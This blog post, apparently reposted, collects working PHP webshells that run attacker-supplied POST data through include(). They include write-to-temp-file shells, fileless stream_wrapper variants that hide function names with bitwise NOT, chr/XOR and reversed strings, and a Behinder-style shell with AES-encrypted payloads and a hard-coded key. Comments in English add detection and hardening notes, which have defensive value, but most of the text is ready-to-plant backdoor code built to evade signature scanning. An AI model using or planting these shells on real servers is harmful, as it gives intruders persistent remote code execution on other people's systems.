include方式webshell

写文件include

//来源于网络
<?php
// Write-then-include webshell sample, annotated for analysis.
// ~urldecode("%99%96%93...") applies bitwise NOT to the decoded bytes, which yields
// the string "file_put_contents"; calling the function through a computed string
// keeps its name out of plain-text signature scans.
// The call writes POST field `a`, wrapped in PHP open/close tags, to temp.php in the
// current directory, and include() then runs that file, so request data executes
// as PHP.
// Detection: ~urldecode(...) used as a callable, a request superglobal concatenated
// into a string that starts with "<?php", and an unexpected temp.php in the web root.
// NOTE(review): `a` is an unquoted constant; PHP 8 raises an Error for undefined
// constants, so this form presumably targets PHP 7 and older - confirm.
(~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('temp.php','<?php '.$_POST[a].' ?>');include('temp.php');
?>
//来源于网络
<?php
// Unobfuscated write-then-include variant, annotated for analysis.
// Opens temp.php for writing (truncating any existing content).
$file = fopen("temp.php","w");
// Writes POST field `a` wrapped in PHP tags; fwrite() returns the byte count and
// echo sends that number back in the HTTP response.
echo fwrite($file,"<?php ".$_POST[a].' ?>');
fclose($file);
// Executes the file that was just written, so the request body runs as PHP.
// Detection: file-integrity monitoring on the web root catches the temp.php write;
// source scanning should flag fwrite()/include() fed by a request superglobal.
include('temp.php');
?>

无文件落地include

适用于蚁剑、菜刀等通用客户端

通过 stream_wrapper_register 注册自定义协议(流包装器),把传入的字符串当作文件交给 include 执行,无需将文件写入磁盘。

// Builds PHP source in the global $user from POST field `a`, wrapped in PHP
// open/close tags. Nothing is written to disk at this point.
// Detection: a request superglobal concatenated into a string beginning with "<?php".
$user="<?php ".$_POST[a].' ?>';
/**
 * Stream wrapper that serves the value of a global variable as if it were a file.
 *
 * stream_open() takes the host part of the opened URL as a variable name and copies
 * that global's value into the wrapper; stream_read() hands it out in chunks.
 * The class performs no validation of the path or of the variable it resolves.
 */
class VStream {
// Content served to the reader.
private $string;
// Current read offset into $string.
private $position;
/**
 * Load the global variable named by the URL host into the wrapper.
 *
 * $mode, $options and $opened_path are accepted but not used.
 * Always returns true, even when the host or the variable is missing.
 */
public function stream_open($path, $mode, $options, &$opened_path) {
$url = parse_url($path);
$id = $url["host"];
// Variable-variable: imports the global whose name equals the URL host.
global $$id;
$this->string = $$id;
$this->position = 0;
return true;
}
/**
 * Return up to $count bytes from the current offset and advance the offset
 * by the number of bytes actually returned.
 */
public function stream_read($count) {
$ret = substr($this->string, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
// Empty bodies: both methods return null.
public function stream_eof() {}
public function stream_stat() {}
}
// Registers VStream for the "var" scheme and includes var://user: stream_open() maps
// the host "user" to the global $user, so that string is compiled and executed as
// PHP without any file being written.
// Detection / hardening: file-integrity monitoring does not see this variant. Flag
// stream_wrapper_register() with a user-defined class followed by include() of the
// same scheme, and consider adding stream_wrapper_register to disable_functions
// where the application does not need it.
// NOTE(review): the wrapper is registered without flags, so it is presumably treated
// as a local stream and not restricted by allow_url_include - confirm.
stream_wrapper_register("var", "VStream");
include("var://user");
?>

进一步去除代码中的 $_POST 字面特征,并对请求参数进行 base64 编码

<?php
/**
 * Build the string "_POST" at run time.
 *
 * chr(51^99), chr(93^18), chr(70^21) and chr(39^115) evaluate to "P", "O", "S", "T",
 * so the superglobal's name never appears as a literal in the source.
 * Detection: names assembled from chr() of XOR-ed integer constants.
 *
 * @return string the variable name "_POST"
 */
function AtgI(){
$_1='_'.chr(51^99).chr(93^18).chr(70^21).chr(39^115);
return $_1;
}
// strrev(edoced_46esab) reverses the unquoted constant's name into "base64_decode"
// and calls it on ${AtgI()}[a], a variable-variable that resolves to $_POST[a].
// NOTE(review): this depends on undefined constants falling back to their own name,
// which PHP 8 turned into an Error - presumably only works on PHP 7 and older; confirm.
// Detection: strrev() or chr() producing a callable name, and ${func()}[...] access.
$params = strrev(edoced_46esab)(${AtgI()}[a]);
// The decoded request value is wrapped in PHP tags and kept in the global $user.
$user="<?php ".$params.' ?>';
/**
 * Stream wrapper that serves the value of a global variable as if it were a file.
 *
 * stream_open() takes the host part of the opened URL as a variable name and copies
 * that global's value into the wrapper; stream_read() hands it out in chunks.
 * The class performs no validation of the path or of the variable it resolves.
 */
class VStream {
// Content served to the reader.
private $string;
// Current read offset into $string.
private $position;
/**
 * Load the global variable named by the URL host into the wrapper.
 *
 * $mode, $options and $opened_path are accepted but not used.
 * Always returns true, even when the host or the variable is missing.
 */
public function stream_open($path, $mode, $options, &$opened_path) {
$url = parse_url($path);
$id = $url["host"];
// Variable-variable: imports the global whose name equals the URL host.
global $$id;
$this->string = $$id;
$this->position = 0;
return true;
}
/**
 * Return up to $count bytes from the current offset and advance the offset
 * by the number of bytes actually returned.
 */
public function stream_read($count) {
$ret = substr($this->string, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
// Empty bodies: both methods return null.
public function stream_eof() {}
public function stream_stat() {}
}
// Registers VStream for the "var" scheme and includes var://user: stream_open() maps
// the host "user" to the global $user, so the base64-decoded request value is
// compiled and executed as PHP without any file being written.
// Detection / hardening: the request carries only base64 text, so signatures on
// plain PHP keywords in traffic will miss it; flag stream_wrapper_register() plus
// include() of the same custom scheme in source, and consider disabling
// stream_wrapper_register via disable_functions where the application allows.
stream_wrapper_register("var", "VStream");
include("var://user");
?>

behinder

<?php
// Turns off error reporting so failures produce no visible output in responses.
@error_reporting(0);
session_start();
// Hard-coded 16-character key, also stored in the session under 'k'.
// Because it is a fixed literal, it can serve as a static indicator for this sample.
$key="dd42f170a6074880";
$_SESSION['k']=$key;
session_write_close();
// Reads the raw request body instead of $_POST, so the payload is an opaque blob
// rather than named form fields.
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
// Fallback when OpenSSL is absent: base64-decode, then XOR every byte with the key.
// "base64_"."decode" splits the function name so it never appears as one literal.
$t="base64_"."decode";
$post=$t($post."");

// $i+1&15 parses as ($i+1)&15 because + binds tighter than &, cycling the key index
// over 0..15.
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
// With OpenSSL: decrypts the body using cipher name "AES128" and the same key;
// no IV argument is passed.
$post=openssl_decrypt($post, "AES128", $key);
}
// The decrypted payload is split on '|'. The second field is used as PHP source;
// $func is assigned but not used in the code visible here.
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];

// PHP source kept in the global $user: an opening tag, the @ error-suppression
// operator, then the decrypted second field.
// Detection: request bodies are encrypted or encoded, so traffic content signatures
// are of limited use; source scanning for decrypted input concatenated into a
// "<?php" string is more reliable.
$user='<?php @'.$params;
/**
 * Stream wrapper that serves the value of a global variable as if it were a file.
 *
 * stream_open() takes the host part of the opened URL as a variable name and copies
 * that global's value into the wrapper; stream_read() hands it out in chunks.
 * The class performs no validation of the path or of the variable it resolves.
 */
class VStream {
// Content served to the reader.
private $string;
// Current read offset into $string.
private $position;
/**
 * Load the global variable named by the URL host into the wrapper.
 *
 * $mode, $options and $opened_path are accepted but not used.
 * Always returns true, even when the host or the variable is missing.
 */
public function stream_open($path, $mode, $options, &$opened_path) {
$url = parse_url($path);
$id = $url["host"];
// Variable-variable: imports the global whose name equals the URL host.
global $$id;
$this->string = $$id;
$this->position = 0;
return true;
}
/**
 * Return up to $count bytes from the current offset and advance the offset
 * by the number of bytes actually returned.
 */
public function stream_read($count) {
$ret = substr($this->string, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
// Empty bodies: both methods return null.
public function stream_eof() {}
public function stream_stat() {}
}
// Registers VStream for the "var" scheme and includes var://user: stream_open() maps
// the host "user" to the global $user, so the decrypted payload is compiled and
// executed as PHP without any file being written.
// Detection / hardening: nothing lands on disk beyond this script itself, so
// file-integrity monitoring only helps at the moment the script is planted; flag
// stream_wrapper_register() plus include() of the same custom scheme in source, and
// consider disabling stream_wrapper_register via disable_functions where possible.
stream_wrapper_register("var", "VStream");
include("var://user");
?>

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!